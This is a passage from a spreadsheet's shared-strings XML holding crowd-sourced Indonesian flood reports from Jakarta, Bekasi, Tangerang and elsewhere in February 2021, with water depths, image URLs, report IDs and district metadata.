    <t>Terpantau banjir di Belakang Pasar Warung Buncit kurang lebih setinggi leher orang dewasa, akses untuk keluar/masuk sangat sulit oleh:Linda"</t>
  </si>
  <si>
    <t>43d452bb-a8a2-4921-8a86-7821e2b8af68</t>
  </si>
  <si>
    <t>https://images.petabencana.id/43d452bb-a8a2-4921-8a86-7821e2b8af68.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "871", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>263c9141-103a-47d4-863a-c959680b0db7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/263c9141-103a-47d4-863a-c959680b0db7.jpg</t>
  </si>
  <si>
    <t>Ada banjir di Jalan duren Bangka, ngak bisa lewat</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357997</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/20/357997-16138102561783401551.mp4-03.jpg</t>
  </si>
  <si>
    <t>Warga Telukjambe yang Kebanjiran Terima Bantuan Air Bersih</t>
  </si>
  <si>
    <t>Alhamdulillah, terima kasih bantuan air bersih dari PDAM Tirta Tarum Karawang kepada warga Perumnas Bumi Telukjambe, Karawang Barat.</t>
  </si>
  <si>
    <t>Sukaluyu</t>
  </si>
  <si>
    <t>0979bdd0-5203-475c-94e8-427966c6ba79</t>
  </si>
  <si>
    <t>Perumahan Pinang Griya Permai. Jl. Dahlia</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/aasUWdubtRaHt6QaWogk4zXsNkf65B6ZlGy1Nz8JfPa3dm-mVm6Gh-g4AB6u2DWI2qDUYD0EDyTP2AW_VWtvZtlI1vj-Q2awkXbXUPJt=s480-c</t>
  </si>
  <si>
    <t>RT 03/04 karet Semanggi ketinggian air dalam rumah 1,5 meter \u1f62d</t>
  </si>
  <si>
    <t>7cc687e3-883c-4299-b85c-328a36eca72d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7cc687e3-883c-4299-b85c-328a36eca72d.jpg</t>
  </si>
  <si>
    <t>banjir diwisma tajur, bajir masih terus naik perlahan. ada tanggul jebol di tahun 2020 yang belum diperbaiki."</t>
  </si>
  <si>
    <t>e1fdffa6-607f-43a4-8c96-d0fd12cdf773</t>
  </si>
  <si>
    <t>Meskintidak tinggi, genangan yang ada cukup menyulitkan pengendara motor, pejalan kaki, dan pengendara mobil sedan dan city car lainnya.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357998</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/20/1613811268516734349.jpg</t>
  </si>
  <si>
    <t>Jalan Perjuangan Kebon Jeruk Tergenang Air Setinggi 60 Cm</t>
  </si>
  <si>
    <t>Banjir di Kebon Jeruk, Jakarta mengakibatkan jalan tergenang air sampai 60 cm, tepatnya di Jalan Perjuangan samping tol Kebon Jeruk. Hal tersebut menjadi keresahan warga karena air belum dapat surut.</t>
  </si>
  <si>
    <t>c4991ed5-7849-489c-b346-410414a031bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4991ed5-7849-489c-b346-410414a031bb.jpg</t>
  </si>
  <si>
    <t>a4d0d1df-9bdd-474d-ad22-9cc2d5b6a583</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4d0d1df-9bdd-474d-ad22-9cc2d5b6a583.jpg</t>
  </si>
  <si>
    <t>Hujan baru di awal udah se lutut. Ujung se pinggang orang dewasa</t>
  </si>
  <si>
    <t>Gondrong</t>
  </si>
  <si>
    <t>f2768bb2-b0db-4088-b7bb-e25e415fc2bc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2768bb2-b0db-4088-b7bb-e25e415fc2bc.jpg</t>
  </si>
  <si>
    <t>Air mulai menggenang sejak pukul 1 pagi. Hingga pukul 9 pagi sudah setinggi dada orang dewasa. Stay alert</t>
  </si>
  <si>
    <t>cef4deba-a5ff-4790-b98e-0a99933284f0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cef4deba-a5ff-4790-b98e-0a99933284f0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 187, "report_type": "flood" }</t>
  </si>
  <si>
    <t>dari pondok jaya 1 hingga pondok jaya 10 banjir hingga +/- 200cm</t>
  </si>
  <si>
    <t>3f343e1c-b238-4660-9085-818878a498a6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f343e1c-b238-4660-9085-818878a498a6.jpg</t>
  </si>
  <si>
    <t>akses jalan Tendean tidak bisa di lalui kendaraan</t>
  </si>
  <si>
    <t>c7e4c844-f6a3-48b3-9718-4a2494b5eabc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c7e4c844-f6a3-48b3-9718-4a2494b5eabc.jpg</t>
  </si>
  <si>
    <t>50-60 cm lah belom coba ukur, tahun lalu sih kalau saya keluar depan pagar air segitu sudah sepaha org dewasa</t>
  </si>
  <si>
    <t>399a139a-e1cc-4ac3-803c-a3a45b06d7c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/399a139a-e1cc-4ac3-803c-a3a45b06d7c9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "693", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di wilayah kelurahan kwitang setinggi 20cm</t>
  </si>
  <si>
    <t>71f53d99-8107-45f9-b9aa-61f850d26ff3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71f53d99-8107-45f9-b9aa-61f850d26ff3.jpg</t>
  </si>
  <si>
    <t>Ini foto diambil tadi pagi. Skrg makin meninggi (setinggi paha org dewasa) Warga Jl.Nabet &amp; Jl.Briti terjebak krn jln keluar-masuk tertutup</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TD3xldY9kcoomIMj3Xgk1JIuIvsDoSwDbPdhoTJ7j7007zNmWFaadXLDroy8gxGYQRy6j1r4i4dKajnzaaqhQd5UhjdQitABMRIbc8vrmA=s480-c</t>
  </si>
  <si>
    <t>Banjir warga  di RT 007  RW 07 dan RT 003 RW 05 Belum tindak lanjut oleh aparat yg berwenang. Akibat akses ditutup oleh pihak komplek."</t>
  </si>
  <si>
    <t>6caeca9f-be11-4541-91bb-d13a81b826be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6caeca9f-be11-4541-91bb-d13a81b826be.jpg</t>
  </si>
  <si>
    <t>Banjir di jl. Kh ahmad dahlan gondrong, petir, cipondoh depan komplek griya permata. luapan dari kali angke.</t>
  </si>
  <si>
    <t>98db1792-4a39-4621-b785-c4fda3394a5e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98db1792-4a39-4621-b785-c4fda3394a5e.jpg</t>
  </si>
  <si>
    <t>Tolong untuuk pencegahan banjirnya dan memang sudah bencanaa banjir efakuasi bantuannya.</t>
  </si>
  <si>
    <t>Tambun</t>
  </si>
  <si>
    <t>8b04abe5-f680-4d9e-8dd0-f6c6c0c1f584</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b04abe5-f680-4d9e-8dd0-f6c6c0c1f584.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "207", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>4b008069-bdcc-40f5-8816-a0a292ba846b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b008069-bdcc-40f5-8816-a0a292ba846b.jpg</t>
  </si>
  <si>
    <t>Banjir di depan Ruko Jalan Merpati I Sawah Lama, Ciputat Tangerang Selatan membuat kemacetan disekitar lokasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/N7l3fPiEmyr3a8pw9tc_x7ouhhjpW1rIY1LBhZFFtOYN5dVg_WtS4omR5Bm7dFx4F0mVym1Em6RuDQpkklPAxTIFLeWsscRXxcvK_wxd6rM=s480-c</t>
  </si>
  <si>
    <t>ga surut dari semalem.. sedot donk, mana pompanya..</t>
  </si>
  <si>
    <t>28c39b92-8ed9-48f1-83e9-2a24f17945c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/28c39b92-8ed9-48f1-83e9-2a24f17945c9.jpg</t>
  </si>
  <si>
    <t>b19c0b0a-79b4-4f5c-aeef-fcf21d350243</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b19c0b0a-79b4-4f5c-aeef-fcf21d350243.jpg</t>
  </si>
  <si>
    <t>Ketinggian air terus bertambah dari pagi</t>
  </si>
  <si>
    <t>f883fec1-c108-495d-af34-a8dc695412a4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f883fec1-c108-495d-af34-a8dc695412a4.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Taman Pinang Indah, Kel : Neroktog, Kecamatan : Pinang, Tangerang-Banten.</t>
  </si>
  <si>
    <t>Neroktog</t>
  </si>
  <si>
    <t>280b77c3-8c67-49c0-b309-9a4cb166c4cd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/280b77c3-8c67-49c0-b309-9a4cb166c4cd.jpg</t>
  </si>
  <si>
    <t>Kuningan barat IV No.30 Rt 10 Rw 03,Kuningan Barat, Mampang prapatan Anggota rumah 1 nenek"" dan 1 adek sepupu"</t>
  </si>
  <si>
    <t>4d48387a-9b98-4301-899e-507601749fa6</t>
  </si>
  <si>
    <t>Banjir mulai pukul 13.00</t>
  </si>
  <si>
    <t>26ad1371-da33-4686-b014-1f7eab04ace2</t>
  </si>
  <si>
    <t>Perumahan P dan K</t>
  </si>
  <si>
    <t>259768f9-8b85-4282-a4cc-a3c062712dd6</t>
  </si>
  <si>
    <t>Dari pondok jaya 1 sampai pondok jaya 10</t>
  </si>
  <si>
    <t>2e476794-982c-458c-a433-7e240c8b053f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e476794-982c-458c-a433-7e240c8b053f.jpg</t>
  </si>
  <si>
    <t>Grand residance bekasi</t>
  </si>
  <si>
    <t>de22e95d-efb3-4743-ab25-1d8023a15011</t>
  </si>
  <si>
    <t>Mobil truk hanyut</t>
  </si>
  <si>
    <t>Mekarwangi</t>
  </si>
  <si>
    <t>ccabe00a-8729-4ee1-bbee-fa362a5106dc</t>
  </si>
  <si>
    <t>Perumahan Pinang Griya Permai kejadian mulai pukul 00.00 dini hari dan terus naik hingga saat ini</t>
  </si>
  <si>
    <t>90f61faa-47f1-4000-9e01-bca416515904</t>
  </si>
  <si>
    <t>https://images.petabencana.id/90f61faa-47f1-4000-9e01-bca416515904.jpg</t>
  </si>
  <si>
    <t>Banjir ga surut2 dari jam 2, masih se pinggul di jam 7 malam</t>
  </si>
  <si>
    <t>7283c2a4-e06c-4a53-b97d-9943fc7ebeb7</t>
  </si>
  <si>
    <t>Jatibening, Bekasi banjir</t>
  </si>
  <si>
    <t>fc8cd920-5a37-4361-ba86-56a1863cc1de</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fc8cd920-5a37-4361-ba86-56a1863cc1de.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 109, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Air naik cepet bgt, 1 jam sudah sampai ketinggian semeter</t>
  </si>
  <si>
    <t>Puseurjaya</t>
  </si>
  <si>
    <t>f7dba3f1-f86e-4970-adc5-aef13d1c1436</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7dba3f1-f86e-4970-adc5-aef13d1c1436.jpg</t>
  </si>
  <si>
    <t>Pintu masuk Ke Kencana, Jl. Surya Kencana - H. Djole Padurenan Bekasi"</t>
  </si>
  <si>
    <t>58467a7c-3b15-439b-a025-7ac1cdb0f3d2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/58467a7c-3b15-439b-a025-7ac1cdb0f3d2.jpg</t>
  </si>
  <si>
    <t>Banjir deras setinggi paha orang dewasa</t>
  </si>
  <si>
    <t>1af4219b-1650-47dc-8a11-2f4af7ea41c4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1af4219b-1650-47dc-8a11-2f4af7ea41c4.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi paha orang dewasa, aliran deras</t>
  </si>
  <si>
    <t>734cd3bb-4f95-4189-8d7a-5da6b73ad68c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/734cd3bb-4f95-4189-8d7a-5da6b73ad68c.jpg</t>
  </si>
  <si>
    <t>81d214c6-a9eb-498a-acd6-3d1091d92d45</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 2, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Mampang prapatan 1 banjir &amp; mati listrik</t>
  </si>
  <si>
    <t>d9405aab-5692-4f8b-93aa-bb281f0ac11d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9405aab-5692-4f8b-93aa-bb281f0ac11d.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZqyOX6ShHmETmzkQU1A9MbUFA9Tb2Oa4yypRC5aKceKAxto-bmYGG1ekY1ZePf3WssdvPbTwJA2LSH2ILtGCm5dB8zi8t4ZqEIHL6SHN=s480-c</t>
  </si>
  <si>
    <t>ketinggian air dalam rumah. RT 03/04 karet Semanggi se dengkul orang dewasa. usul pak/ ibu kalau ada pompa kecil tolong di berdayakan di tempat kami untuk menyedot air yang terjebak didalam rumah. terimakasih"</t>
  </si>
  <si>
    <t>fe009905-802d-45e3-89fb-7fd62eb7c0f3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fe009905-802d-45e3-89fb-7fd62eb7c0f3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "917", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tempat saya kos banjir selutut orang dewasa . Belum lagi sekitar gang masuk yang berpemukiman kumuh</t>
  </si>
  <si>
    <t>a228607c-de46-4dc5-b116-5b6bd25a12ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a228607c-de46-4dc5-b116-5b6bd25a12ad.jpg</t>
  </si>
  <si>
    <t>They still need help to the rescue</t>
  </si>
  <si>
    <t>0ad9a184-ae67-45d9-9ac1-4e291863e6f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0ad9a184-ae67-45d9-9ac1-4e291863e6f6.jpg</t>
  </si>
  <si>
    <t>442d9193-ff07-4011-8be4-b98f3d2cdd16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/442d9193-ff07-4011-8be4-b98f3d2cdd16.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 113, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Mohon bantuan makanan</t>
  </si>
  <si>
    <t>a095cc58-9e02-454a-aa99-3d277188f9bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a095cc58-9e02-454a-aa99-3d277188f9bb.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "981", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir terparah kembali pada tahun 2021 setelah beberapa tahun yg lalu. Yg paling sedih laptop, skripsi dan berkas penting tidak tertolong.</t>
  </si>
  <si>
    <t>1c172143-f2b3-4fcd-9331-d36ced52d9fc</t>
  </si>
  <si>
    <t>Dari pagi ke malam ini, ketinggian air semakin naik. Level air kali terdekat pun tinggi, semoga aliran air lancar dan tidak meluap</t>
  </si>
  <si>
    <t>1ec63a9f-8aeb-40df-a956-7987a6acdb74</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ec63a9f-8aeb-40df-a956-7987a6acdb74.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 141 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1018", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>58ea819b-b867-4189-bb3c-f11cf90d7b48</t>
  </si>
  <si>
    <t>Banjir setinggi lutut orang dewasa</t>
  </si>
  <si>
    <t>d8f9051b-dee5-4174-84bb-31b021a765d2</t>
  </si>
  <si>
    <t>Banjir pagi sabtu tgl 20 feb 2021</t>
  </si>
  <si>
    <t>b8ed8706-6729-4bcd-b0c6-d0798845a74a</t>
  </si>
  <si>
    <t>Banjir puter balik naik ojek online barusan</t>
  </si>
  <si>
    <t>cb1e4b4a-86e1-4ecf-b592-cdead8ca948d</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 8 }</t>
  </si>
  <si>
    <t>Air agak naik. Belum ada tanda2 ketinggian banjir menurun.</t>
  </si>
  <si>
    <t>1749ee62-d5bd-41e4-8026-8ec8ffd1c7ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1749ee62-d5bd-41e4-8026-8ec8ffd1c7ee.jpg</t>
  </si>
  <si>
    <t>Banjir Sekitar 1 meter lebih, didaerah perumahan Pinang Griya, Ciledug Tangerang</t>
  </si>
  <si>
    <t>eba13cd4-b06d-4758-b9a5-c77bccea15f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eba13cd4-b06d-4758-b9a5-c77bccea15f2.jpg</t>
  </si>
  <si>
    <t>Air makin bertambah tinggi sejak sore</t>
  </si>
  <si>
    <t>bf4171ff-3eec-4d0f-9b06-67143ae34a02</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bf4171ff-3eec-4d0f-9b06-67143ae34a02.jpg</t>
  </si>
  <si>
    <t>6589ca02-bddc-40c0-a76c-73863e5fe7eb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6589ca02-bddc-40c0-a76c-73863e5fe7eb.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1165", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir daerah Jl Bank III No 1</t>
  </si>
  <si>
    <t>a06f8503-36df-4aaa-b951-5cffba2448dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a06f8503-36df-4aaa-b951-5cffba2448dc.jpg</t>
  </si>
  <si>
    <t>Kejadian pagi (20/02/2021) lalu. Malam ini hujan jadi kemungkinan air akan naik</t>
  </si>
  <si>
    <t>34b793e9-15a2-4d9f-9f2e-442920c5b12f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34b793e9-15a2-4d9f-9f2e-442920c5b12f.jpg</t>
  </si>
  <si>
    <t>Banjir di sekitar jalan poncol, cilandak</t>
  </si>
  <si>
    <t>3051e9f6-fd23-43e2-b86f-f7a4e014b3a7</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 6 }</t>
  </si>
  <si>
    <t>as</t>
  </si>
  <si>
    <t>Babakan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VdWoNvH7gn51kPNXeecXyo5zECSfRlt15erGZrJSosIzM_loIo1QLk2L7h5E6m7k7ka9XFVvhhgyKE20TyFEHPa_WfaoHRzcyt9vUKjefw=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap banjir di jalan delima, mungkin bisa di sedot</t>
  </si>
  <si>
    <t>deb50a35-e998-43e8-8661-b3196f122e8e</t>
  </si>
  <si>
    <t>Akses masuk dari fresh market ke mrc masih setinggi dengkul</t>
  </si>
  <si>
    <t>5877192d-9b81-4ac9-bfce-c410ed902f62</t>
  </si>
  <si>
    <t>Banjir se mulut orang dewasa</t>
  </si>
  <si>
    <t>fc944770-96fe-4b6a-b0ea-3b7303977e66</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fc944770-96fe-4b6a-b0ea-3b7303977e66.jpg</t>
  </si>
  <si>
    <t>Air kali disekitaran rumah terus naik hingga meluap ke jalanan dan masuk ke dalam rumah</t>
  </si>
  <si>
    <t>223f2042-38df-43a6-9560-af76dcc104aa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/223f2042-38df-43a6-9560-af76dcc104aa.jpg</t>
  </si>
  <si>
    <t>500b992b-7ad7-4b67-ae86-b0b53f5e4c8c</t>
  </si>
  <si>
    <t>Desa karangrowo dan mungkin sekitarnya butuh bantuan</t>
  </si>
  <si>
    <t>Karangrowo</t>
  </si>
  <si>
    <t>Jakenan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xvrf15Lb19LuYlqNVGsM78KSJOMtjUy8FwN1mmA7RF4gS0bR_TPl1tq2FaWJ3WL66M_dbrOXloyesUshESZwYINAka79OTTuMnXd95zXNQ=s480-c</t>
  </si>
  <si>
    <t>Banjri parah, tidak ada tindakan dari RW dan kelurahan kuningan barat untuk warga di pelosok, bahan makanan habis, tidak kiriman pasokan makanan...</t>
  </si>
  <si>
    <t>25ed4d31-d21c-4d8f-974b-843113faac28</t>
  </si>
  <si>
    <t>Banjir selutut di tepi kiri, tepi kanan setinggi mata kaki</t>
  </si>
  <si>
    <t>2ce7c649-4884-4073-af7f-d3e55922e8db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2ce7c649-4884-4073-af7f-d3e55922e8db.jpg</t>
  </si>
  <si>
    <t>Banjir di RT 10 RW 02</t>
  </si>
  <si>
    <t>6c09784b-2107-47ca-bf32-e4e31f1b2914</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c09784b-2107-47ca-bf32-e4e31f1b2914.jpg</t>
  </si>
  <si>
    <t>Arah ciledug tidak bisa dilintasi</t>
  </si>
  <si>
    <t>dd824d05-871a-4317-bdb5-1ab23e69d8f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dd824d05-871a-4317-bdb5-1ab23e69d8f4.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 108, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Perumnas BTJ Blok X</t>
  </si>
  <si>
    <t>17677a16-4333-45cc-b6d3-d3c00afe57b2</t>
  </si>
  <si>
    <t>Mohon bantuannya untuk tim sar, sejak tadi siang air nya pelan2 naik dan lokasi ini msk lokasi siaga 2 BPBD.Ketinggian air 1m di luar rumah.</t>
  </si>
  <si>
    <t>09410970-568f-45ea-ba0b-ee4e94385d06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09410970-568f-45ea-ba0b-ee4e94385d06.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 137, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir setinggi pundak orang dewasa. Listrik padam. Air bersih tidak ada</t>
  </si>
  <si>
    <t>ea96c376-c0eb-4fa0-8303-de16b3aba283</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ea96c376-c0eb-4fa0-8303-de16b3aba283.jpg</t>
  </si>
  <si>
    <t>Banjir di Mojo,kediri,jawa timur</t>
  </si>
  <si>
    <t>Tambibendo</t>
  </si>
  <si>
    <t>6bd1aa11-38cd-4360-b349-9d596aaea2a4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bd1aa11-38cd-4360-b349-9d596aaea2a4.jpg</t>
  </si>
  <si>
    <t>Tolong di pantau ada warga di situ blm mengungsi dan ketinggian air makin naik</t>
  </si>
  <si>
    <t>64637193-74e2-4b5f-9c69-12576ca124c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64637193-74e2-4b5f-9c69-12576ca124c9.jpg</t>
  </si>
  <si>
    <t>Ciledug indah banjir, lumayan tinggi.</t>
  </si>
  <si>
    <t>aa3f2457-c722-4aad-a0e5-2893dd4496f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aa3f2457-c722-4aad-a0e5-2893dd4496f5.jpg</t>
  </si>
  <si>
    <t>dari tadi subuh air blm turun,yg ada tambah naik</t>
  </si>
  <si>
    <t>3ad8c71c-051e-471e-9672-281145375f74</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ad8c71c-051e-471e-9672-281145375f74.jpg</t>
  </si>
  <si>
    <t>Banjir di wilah kediri jawa timur Pt Gudanggaram</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cX3-yqC_DQqrX6jUMDW31nP-POL7Wne4PuZsFLTbA1Y5t4u7gh15WxwNzqRcVRmj57wBpaoHIYNivNNQhpGy3cNEM73HDmjYLnHhTWXMKw=s480-c</t>
  </si>
  <si>
    <t>banjir belum surut surut, Jalan Bungur Besar Gang 19</t>
  </si>
  <si>
    <t>1686098e-bded-4d4a-80cb-1befb5a5a2ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1686098e-bded-4d4a-80cb-1befb5a5a2ca.jpg</t>
  </si>
  <si>
    <t>Jl. Karet Semanggi 1, banjor dari 8 pagi hingga malam hari 23.30 belum surut, belum ada penyedotan air, saluran macet krn pembangunan aptmen</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KhtZuJE3N-aPIcG6yEYfRgj6twv3NH1_ciLvZQjSsE1kJ98FfY2GSSwaIxlizqLkQGVASY3HDhweAxeX5i4Im8HNaTcdOUDgI3G16kFu580=s480-c</t>
  </si>
  <si>
    <t>haduuhg tolong tolong ini banjir dari taon ke taon selalu sama aja, banjir kiriman yang ga tau dr mana, bisa kali di bawain mesin pompa sedot</t>
  </si>
  <si>
    <t>08e5f77a-8c96-4c8c-bedb-37c54ca770ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/08e5f77a-8c96-4c8c-bedb-37c54ca770ca.jpg</t>
  </si>
  <si>
    <t>b9b64d45-28db-4dfa-bfab-2cfe2dd7b928</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b9b64d45-28db-4dfa-bfab-2cfe2dd7b928.jpg</t>
  </si>
  <si>
    <t>{ "points": -3, "flood_depth": 198, "report_type": "flood" }</t>
  </si>
  <si>
    <t>e9855092-c68e-4a66-a11a-1f8fc8d75b42</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e9855092-c68e-4a66-a11a-1f8fc8d75b42.jpg</t>
  </si>
  <si>
    <t>Banjir mutiara pluit, tanggul air jebol dari pukul 05.00 pagi dini hari</t>
  </si>
  <si>
    <t>21e91578-efce-414f-97e6-e102e02734bf</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 31, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sakarang dah surut pafivtadi sampai sore banjir.</t>
  </si>
  <si>
    <t>adb6ade6-0da3-4f6c-a6b2-d770203c4a19</t>
  </si>
  <si>
    <t>https://images.petabencana.id/adb6ade6-0da3-4f6c-a6b2-d770203c4a19.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1019", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>fa306e36-6f5f-40da-9be8-0db2e28102ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fa306e36-6f5f-40da-9be8-0db2e28102ff.jpg</t>
  </si>
  <si>
    <t>Banjir Perumahan Pondok AFI2 kedung pengawas ,Babelan setinggi 50cm</t>
  </si>
  <si>
    <t>Kedungpengawas</t>
  </si>
  <si>
    <t>017fefbc-2d09-4d8b-8a86-83f6e638d6ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/017fefbc-2d09-4d8b-8a86-83f6e638d6ec.jpg</t>
  </si>
  <si>
    <t>b8825515-e48d-4aed-bbfc-1b558d5a7a59</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 67, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1172", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>becc879d-b4c9-414e-b7af-3b38c82d7c81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/becc879d-b4c9-414e-b7af-3b38c82d7c81.jpg</t>
  </si>
  <si>
    <t>Banjir di Kedung Waringin blm ada bantuan samsek kejebak dr jam 6 sore. Macet total gada pergerakan samasekali. Hujan terus ga berenti :(</t>
  </si>
  <si>
    <t>6bc1817d-d5f9-4b3d-84a8-5fd74389d7e5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bc1817d-d5f9-4b3d-84a8-5fd74389d7e5.jpg</t>
  </si>
  <si>
    <t>Banjir villa mutiara pluit, periuk, Tangerang, tinggi air 40-130 cm</t>
  </si>
  <si>
    <t>6985feae-3a7d-40bd-8537-6ab65563ada3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6985feae-3a7d-40bd-8537-6ab65563ada3.jpg</t>
  </si>
  <si>
    <t>Banjir karena danau tidak bisa menampung lagi air hujan yang deras, ditambah kiriman dari perumahan telaga pasir raya blol ab dan ac.</t>
  </si>
  <si>
    <t>4d7bbeaf-9995-4e06-b9ce-b230193e3be6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d7bbeaf-9995-4e06-b9ce-b230193e3be6.jpg</t>
  </si>
  <si>
    <t>Karena ada penutupan saluran air oleh warga</t>
  </si>
  <si>
    <t>7bc3994f-b93f-42b2-9b9e-4578a3699825</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 29, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1484", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir depan urindo dsk</t>
  </si>
  <si>
    <t>a3ed96e2-8080-4f16-b259-b3616fd3e9b6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3ed96e2-8080-4f16-b259-b3616fd3e9b6.jpg</t>
  </si>
  <si>
    <t>Banjir sebelum putaran kecapi dari arah jalan hankam</t>
  </si>
  <si>
    <t>Jatiwarna</t>
  </si>
  <si>
    <t>9471a88c-687b-4deb-9b7c-d20e048899e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9471a88c-687b-4deb-9b7c-d20e048899e3.jpg</t>
  </si>
  <si>
    <t>Banjir jl.sunter arah jalan kranggan dari mabes</t>
  </si>
  <si>
    <t>70dd7748-14bf-4ee4-80a8-dbd2addcd2ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70dd7748-14bf-4ee4-80a8-dbd2addcd2ab.jpg</t>
  </si>
  <si>
    <t>per minggu 21/02/21.warga mengungsi di mushola setempat.butuh makanan dan air bersih,dan listrik.korban banjir sekitar 50KK.</t>
